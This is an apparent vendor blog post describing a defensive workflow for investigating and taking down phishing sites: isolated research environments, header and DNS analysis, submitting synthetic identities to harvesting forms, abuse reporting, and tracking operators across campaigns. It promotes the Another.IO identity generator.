Generate
Back to Blog
Phishing email analysis workspace showing URL inspection and header forensics

A new phishing email lands in a shared abuse mailbox. The subject line mimics an invoice notification from a well-known logistics company. The HTML body is a pixel-perfect copy of the real brand's template, complete with tracking numbers and a "View Shipment" button that points to a domain registered forty-eight hours ago. Somewhere behind that domain sits a credential-harvesting page, probably backed by a phishing kit sold on a Telegram channel for thirty dollars. The researcher's job is to trace the infrastructure, document the campaign, and get it taken down before the victim count climbs.

The job sounds straightforward. It is not. Phishing operators are aware they're being hunted. Modern kits include anti-researcher features: IP-based geofencing that blocks requests from known VPN ranges, browser fingerprinting that detects automated tools, and honeypot detection pages that serve benign content to anyone who doesn't arrive through the phishing link's exact referrer chain. Investigating safely and effectively requires operational discipline, disposable infrastructure, and identity data that doesn't trace back to the researcher.

Why Real Identity Data Has No Place in Phishing Research

The first instinct when investigating a credential-harvesting page is to submit something and see what happens. Does the page validate input? Does it redirect to the real site after submission? Does it send the harvested data to a Telegram bot, an email address, or a remote server?

Submitting real credentials is obviously out of the question. Submitting the researcher's real name and email is nearly as bad. If the phishing operator reviews their logs (and the sophisticated ones do), a submission from a security researcher's known email address signals that the campaign is under investigation. The operator may burn the infrastructure immediately, take the domain offline, and spin up a replacement before the takedown process completes. The researcher loses visibility into the campaign's infrastructure at the worst possible moment.

Submitting obviously fake data ("test@test.com", "John Doe", "123 Fake Street") is marginally better but still problematic. Some kits validate email format against known disposable domains. Others check whether the submitted name and address are internally consistent. A few run real-time checks against databases to verify that the submitted identity is plausible. Failing these checks may trigger the kit's anti-analysis defences, serving a different page or logging the researcher's IP for future blocking.

Synthetic identities solve this. A generated profile with a realistic name, a working email address format on a plausible domain, a phone number with the correct country prefix, and a billing address that matches the phone's region passes automated validation without exposing the researcher's actual identity. The phishing kit treats the submission as a regular victim. The researcher gets to observe the full post-submission flow.

Building the Investigation Environment

Before touching the phishing infrastructure, the research environment needs to be isolated from the researcher's identity and regular working environment.

A dedicated virtual machine running a clean browser installation is the baseline. The VM should not share any identifiers with the researcher's host machine: different timezone settings, different screen resolution, different installed fonts. Phishing kits that fingerprint browsers can correlate visits across sessions if the fingerprint is distinctive. A clean VM with default settings produces a generic fingerprint that blends in with regular traffic.

Network isolation comes next. The VM's traffic should route through a VPN or Tor, with the exit node in a geography that matches the phishing campaign's target audience. A phishing page targeting French bank customers will behave differently when accessed from a French IP than from a US one. Some pages won't load at all from the wrong geography. Using an exit node that matches the target locale ensures the researcher sees what a real victim would see.

DNS resolution should be logged locally. Recording every DNS query the browser makes during the investigation captures the full infrastructure chain: the phishing domain, any CDN or redirect domains, the exfiltration endpoint, and any analytics or tracking domains the kit loads. This DNS log becomes part of the evidence package for the takedown request.

Email handling requires its own isolation. If the investigation involves replying to phishing emails or using email addresses during form submission, those addresses can't be the researcher's real mailbox. A dedicated investigation mailbox, or better, a set of synthetic email addresses that forward to a monitored collection point, keeps the researcher's identity out of the phishing operator's logs while still capturing any follow-up messages the operator sends.

The Investigation Workflow: Step by Step

The investigation proceeds in layers, from passive observation to controlled interaction.

Header analysis comes first. The phishing email's headers reveal the sending infrastructure: the originating IP, the mail server, the SPF/DKIM/DMARC records (or lack of them), and any relay hops. This is purely passive work. No interaction with the phishing infrastructure is needed. The headers alone sometimes reveal the hosting provider, the email service used for delivery, and whether the campaign is operating from compromised infrastructure or purpose-built servers.

WHOIS and DNS reconnaissance follow. The phishing domain's registration records (often privacy-protected, but the registrar itself is useful information), the DNS records (A records, MX records, NS records, TXT records), and the hosting provider all get documented. Historical DNS data from passive DNS databases can reveal whether the domain was recently registered (likely purpose-built for phishing) or was a legitimate domain that's been compromised. Certificate transparency logs show when the SSL certificate was issued and by which CA, which helps establish a timeline.

Controlled page access happens next. The researcher loads the phishing page in the isolated VM, capturing the full HTTP exchange: request headers, response headers, page source, JavaScript files, images, and any external resources loaded. The page source often contains the phishing kit's fingerprint, including variable names, form field structures, and exfiltration URLs that match known kit families. Recording the page's behaviour frame by frame matters because operators frequently modify or take down pages within hours.

Credential submission is the step that requires synthetic identity data. A generated profile gets submitted through the form. The researcher monitors what happens next: where the submitted data is sent (Telegram bot, email, external server), whether the page redirects to the legitimate site (a common trick to reduce victim suspicion), and whether the form submission triggers any secondary actions (downloading malware, setting cookies, loading additional tracking pixels).

The synthetic identity used for submission should be documented in the investigation record. If the same identity later appears in a credential dump or is used in a subsequent attack, that linkage provides intelligence about the operator's data handling practices.

Takedown Execution

Armed with the evidence package, the takedown process involves multiple parties, and the order matters.

The hosting provider gets the first report. Most reputable hosts have abuse desks that respond to phishing reports within hours. The report should include the phishing URL, screenshots of the harvesting page, the DNS records confirming the domain resolves to their infrastructure, and a brief description of the campaign. Hosting providers acting under safe harbour provisions are motivated to respond quickly once they have documented evidence.

The domain registrar gets a parallel report if the domain was registered specifically for phishing (rather than being a compromised legitimate domain). Registrars can suspend domains at the registry level, which is faster and more permanent than asking a hosting provider to remove content. The domain could be moved to a different host in minutes, but a registry suspension takes the domain offline regardless of where it's hosted.

The targeted brand should be notified, especially if they have a dedicated anti-phishing programme. Large banks, payment processors, and technology companies maintain takedown teams that can escalate with hosting providers and registrars through established relationships. Their involvement often accelerates the process.

Browser-level blocking through Google Safe Browsing and Microsoft SmartScreen provides immediate protection for end users even before the infrastructure is taken down. Submitting the URL to these services adds it to the blocklist that Chrome, Firefox, Safari, and Edge check in real time. A blocked URL shows a full-page warning to victims who click the phishing link, which dramatically reduces the campaign's effectiveness even if the page is still technically live.

Certificate authorities can revoke the SSL certificate, which causes browsers to display security warnings when visitors access the page. This is a secondary measure and not all CAs respond quickly, but it's worth including in the evidence distribution.

Tracking Repeat Offenders Across Campaigns

Phishing operators rarely run a single campaign. The same operator or group will register new domains, deploy the same kit with minor modifications, and target the same brands repeatedly. Tracking these patterns across campaigns builds a richer intelligence picture.

Kit fingerprints are the most reliable tracking indicator. The same variable names in the JavaScript, the same form field IDs, the same exfiltration method (Telegram bot token, email address, remote server URL) appear across campaigns even when the domains and hosting change. A database of kit fingerprints extracted during investigations allows researchers to link new campaigns to previously documented ones.

Registration patterns help too. An operator who registers domains through the same registrar, uses the same privacy service, follows the same naming pattern (brand-name-verify-login.com, brand-name-secure-update.net), or uses the same email address across registrations is creating a signature. These patterns become searchable. New domain registrations matching the pattern can be flagged before the phishing page even goes live.

Exfiltration infrastructure often persists across campaigns. A Telegram bot token used to receive harvested credentials in one campaign may appear in a different campaign targeting a different brand. The same email address may collect data from multiple kits. Documenting these endpoints creates a network map of the operator's infrastructure that extends beyond any single campaign.

Synthetic identities submitted during investigations create passive tripwires. If a credential submitted to Campaign A appears in Campaign B's targeting list, it confirms the operator is reusing harvested data. If the synthetic email address receives phishing emails from a different campaign, it confirms the address was shared or sold. These linkages are intelligence that emerges over time, but only if the original investigation used trackable synthetic data rather than throwaway gibberish.

Post-Investigation Hygiene

After the takedown is confirmed, the investigation environment needs to be cleaned and the synthetic identities retired.

The investigation VM should be reverted to its pre-investigation snapshot or destroyed entirely. Any cookies, cached data, or browser state from the investigation could be used to correlate future investigations if the VM is reused. A clean slate for each investigation prevents this.

Synthetic identities used during the investigation should be documented and archived, but not reused in future investigations. If the operator kept logs, they may remember the identity. Reusing it in a different investigation against a different operator creates an unexpected correlation point.

Tools like Another.IO make the disposability practical. Generating a complete, internally consistent identity for each investigation costs seconds rather than hours. The identity passes form validation, doesn't trace back to the researcher, and gets retired after use. The researcher's effort goes to the investigation itself rather than to crafting believable fake personas by hand.

If the synthetic email address used during the investigation continues to receive messages after the investigation, those messages themselves become intelligence. A follow-up phishing email sent to the synthetic address confirms that the operator is recycling harvested credentials for secondary campaigns. A password-reset notification from a legitimate service sent to the synthetic address means the operator attempted to use the submitted credentials on a real platform, confirming that the kit is actively weaponising collected data rather than just stockpiling it.